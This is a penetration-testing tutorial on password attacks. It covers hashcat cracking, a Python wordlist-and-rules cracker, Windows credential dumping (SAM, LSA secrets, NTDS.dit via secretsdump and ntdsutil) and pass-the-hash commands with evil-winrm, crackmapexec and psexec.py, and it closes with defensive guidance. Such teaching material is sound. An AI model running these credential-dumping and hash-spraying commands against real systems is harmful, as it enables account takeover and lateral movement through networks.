Access Techniques

Password Attacks
Crack, Dump, Relay

0x74shelby · Access Techniques · Intermediate

01

Hash Cracking

Hash cracking doesn't reverse a hash function; it finds an input that produces the same hash. You take a wordlist, hash every entry with the same algorithm (and the same per-hash salt, for formats that carry one) and compare the result against the target hash. Offline cracking is fast because nothing is in your way: there are no lockouts or network round trips, and a single GPU computes billions of fast hashes such as MD5 or NTLM per second.

Identify the hash type first. MD5 hashes are 32 hex characters. NTLM (MD4 over the UTF-16LE password) is also 32 hex characters and looks identical on its own; what tells them apart is where the hash came from and the pwdump-style user:RID:LM:NT::: lines that credential dumps use. SHA-256 is 64 hex characters. Linux sha512crypt starts with $6$, and bcrypt starts with $2a$, $2b$ or $2y$ and is deliberately expensive. Tools such as hashid (or hashcat's --identify) list the candidate formats for a hash. The hash type determines the hashcat mode, and the mode determines the speed: the same GPU that does tens of billions of NTLM guesses per second is several orders of magnitude slower against bcrypt, so a wordlist-plus-rules run that finishes in minutes for NTLM may be unaffordable there.

hashcat examples
hashcat -m 0     hash.txt rockyou.txt                        # MD5
hashcat -m 1000  hash.txt rockyou.txt                        # NTLM
hashcat -m 1800  hash.txt rockyou.txt                        # sha512crypt ($6$, Linux /etc/shadow)
hashcat -m 13100 hash.txt rockyou.txt                        # Kerberos 5 TGS-REP etype 23 (Kerberoast)
hashcat -m 1000  hash.txt rockyou.txt -r rules/best64.rule   # NTLM, every word mutated by each rule
hashcat -m 1000  hash.txt --show                             # print already-cracked hash:plaintext pairs from the potfile
hashcat --identify hash.txt                                  # list candidate modes for an unknown hash (hashcat 6.2+)

Rules Multiply Coverage

Rules transform wordlist entries on the fly instead of storing every variant on disk. best64.rule tries capitalisation, number suffixes, and common substitutions. Every rule is applied to every word, so the candidate space scales as words × rules: a 14 million word wordlist with 64 rules becomes 896 million candidates. Most real passwords are dictionary words with predictable mutations, which is why wordlist plus rules is the first attack to run. The speed caveat from above still applies: the multiplier is nearly free against NTLM, but against bcrypt or sha512crypt each of those 896 million candidates costs thousands of hash iterations.
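As an added worked example (not code from the original page or by 0x74shelby), here is a minimal offline dictionary cracker in Python that implements a small subset of hashcat's rule syntax, so you can see both halves of the section in one place: how a hash type is guessed from its shape, and how a handful of rules multiplies a tiny wordlist into many more candidates. The wordlist, rule list and the "P@ssword1" target are constructed for the demo; the md5 of "password" is the well-known value; the hashcat mode numbers are the real ones.

```python
import hashlib


def identify(h: str) -> list[tuple[int, str]]:
    """Guess candidate hashcat modes from the shape of a hash string.
    32 hex characters is ambiguous: MD5 and NTLM look identical, so the origin of
    the hash (web app database vs. SAM/NTDS dump) decides between -m 0 and -m 1000."""
    if h.startswith("$krb5tgs$23$"):
        return [(13100, "Kerberos 5 TGS-REP etype 23")]
    if h.startswith(("$2a$", "$2b$", "$2y$")):
        return [(3200, "bcrypt")]
    if h.startswith("$6$"):
        return [(1800, "sha512crypt")]
    if h.startswith("$1$"):
        return [(500, "md5crypt")]
    if all(c in "0123456789abcdefABCDEF" for c in h):
        return {32: [(0, "MD5"), (1000, "NTLM")],
                40: [(100, "SHA-1")],
                64: [(1400, "SHA-256")],
                128: [(1700, "SHA-512")]}.get(len(h), [])
    return []


def apply_rule(word: str, rule: str) -> str:
    """Apply one hashcat-style rule line (functions separated by spaces).
    Supported subset: ':' passthrough, 'l' lower, 'u' upper, 'c' capitalise,
    'r' reverse, '$X' append X, '^X' prepend X, 'sXY' replace X with Y."""
    out = word
    for fn in rule.split():
        op = fn[0]
        if op == ":":
            continue
        if op == "l":
            out = out.lower()
        elif op == "u":
            out = out.upper()
        elif op == "c":
            out = out[:1].upper() + out[1:].lower()
        elif op == "r":
            out = out[::-1]
        elif op == "$":
            out += fn[1:]
        elif op == "^":
            out = fn[1:] + out
        elif op == "s" and len(fn) == 3:
            out = out.replace(fn[1], fn[2])
        else:
            raise ValueError(f"unsupported rule function {fn!r}")
    return out


def candidates(wordlist, rules):
    """Every (word, rule) pair yields one candidate: len(wordlist) * len(rules) in total."""
    for word in wordlist:
        for rule in rules:
            yield apply_rule(word, rule)


def crack(target_hex: str, wordlist, rules, algo: str = "md5"):
    """Offline attack: hash each candidate with the target's algorithm and compare.
    Returns the recovered plaintext, or None if wordlist+rules never produce it."""
    target = target_hex.lower()
    for cand in candidates(wordlist, rules):
        if hashlib.new(algo, cand.encode()).hexdigest() == target:
            return cand
    return None


def md5_hex(text: str) -> str:
    """Helper used to build a demo target hash inline."""
    return hashlib.md5(text.encode()).hexdigest()


# Constructed demo inputs: a four-word wordlist and a few best64-style rules.
WORDLIST = ["password", "letmein", "summer", "dragon"]
RULES = [":", "c", "c $1", "c $1 $2 $3", "u", "sa@", "c sa@ $1"]

if __name__ == "__main__":
    print(identify("5f4dcc3b5aa765d61d8327deb882cf99"))                  # ambiguous: MD5 or NTLM
    print(crack("5f4dcc3b5aa765d61d8327deb882cf99", WORDLIST, RULES))   # well-known md5("password")
    print(crack(md5_hex("P@ssword1"), WORDLIST, RULES))                 # needs the "c sa@ $1" rule
    print(sum(1 for _ in candidates(WORDLIST, RULES)),
          "candidates from", len(WORDLIST), "words x", len(RULES), "rules")
```

The rule interpreter covers only a few of hashcat's functions (real best64.rule also uses truncation, duplication and position-based edits), but the shape is the same: the wordlist stays small, the rules do the multiplying, and the hash function is the only thing that changes between -m 0 and a slow mode.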

02

Windows Credential Dumping

Windows stores credentials in several places. The SAM database holds local account NTLM hashes, encrypted with a boot key that lives in the SYSTEM hive, which is why every SAM dump also needs SYSTEM. LSASS (Local Security Authority Subsystem Service) keeps the NTLM hashes and Kerberos keys of logged-on users in memory, and plaintext passwords as well when WDigest caching is on (the default before Windows 8.1 / Server 2012 R2, or wherever UseLogonCredential has been set to 1). The SECURITY hive holds LSA secrets such as service account passwords and cached domain logons. NTDS.dit is the Active Directory database on domain controllers and contains the hashes of every domain account, krbtgt included; it is locked while AD is running, so you either take a consistent copy (ntdsutil IFM or a volume shadow copy) or ask the DC to replicate the secrets to you over DRSUAPI, which is what secretsdump does when pointed at a DC remotely.

credential dumping
reg save HKLM\SAM sam.hiv             # local account hashes (encrypted with the boot key); needs local admin
reg save HKLM\SYSTEM system.hiv       # boot key needed to decrypt SAM and the LSA secrets
reg save HKLM\SECURITY security.hiv   # LSA secrets and cached domain logons (DCC2)

secretsdump.py -sam sam.hiv -system system.hiv -security security.hiv LOCAL

# Domain controller, remotely: replicate secrets over DRSUAPI (needs Domain Admin or replication rights)
secretsdump.py domain.local/administrator:[REDACTED]@DC_IP

# Domain controller, on the box: consistent offline copy of NTDS.dit via ntdsutil IFM, parsed afterwards
ntdsutil "ac i ntds" "ifm" "create full c:\ntds" q q
secretsdump.py -ntds "c:\ntds\Active Directory\ntds.dit" -system c:\ntds\registry\SYSTEM LOCAL

03

Pass-the-Hash

NTLM authentication never sends the password. The client proves it knows the NT hash by answering the server's challenge with an HMAC keyed from that hash, so the hash is a password equivalent. If you've dumped an NTLM hash from one machine, you can use it directly to authenticate to other machines on the network without ever cracking it. This is Pass-the-Hash.

pass-the-hash
evil-winrm -i TARGET_IP -u administrator -H NTLM_HASH        # WinRM shell; -H takes the NT hash in place of -p

crackmapexec smb SUBNET/24 -u administrator -H NTLM_HASH     # spray one hash across a subnet; add --local-auth for a local account

psexec.py -hashes :NTLM_HASH administrator@TARGET_IP         # impacket wants LMHASH:NTHASH; the bare colon means "no LM hash"

Pass-the-Hash is why password complexity requirements alone don't prevent lateral movement: the hash of a 30-character passphrase authenticates exactly as well as the hash of a weak one. Once you have one hash, you potentially have keys to everything that account can reach across the entire network, without ever seeing the plaintext password. The defences that work are about scope, not complexity: unique local administrator passwords (LAPS), leaving Remote UAC at its default so local accounts other than the built-in Administrator can't get admin access over the network, Protected Users and Credential Guard for privileged domain accounts, and alerting on network logons (event 4624, logon type 3, authentication package NTLM) from hosts that have no business making them.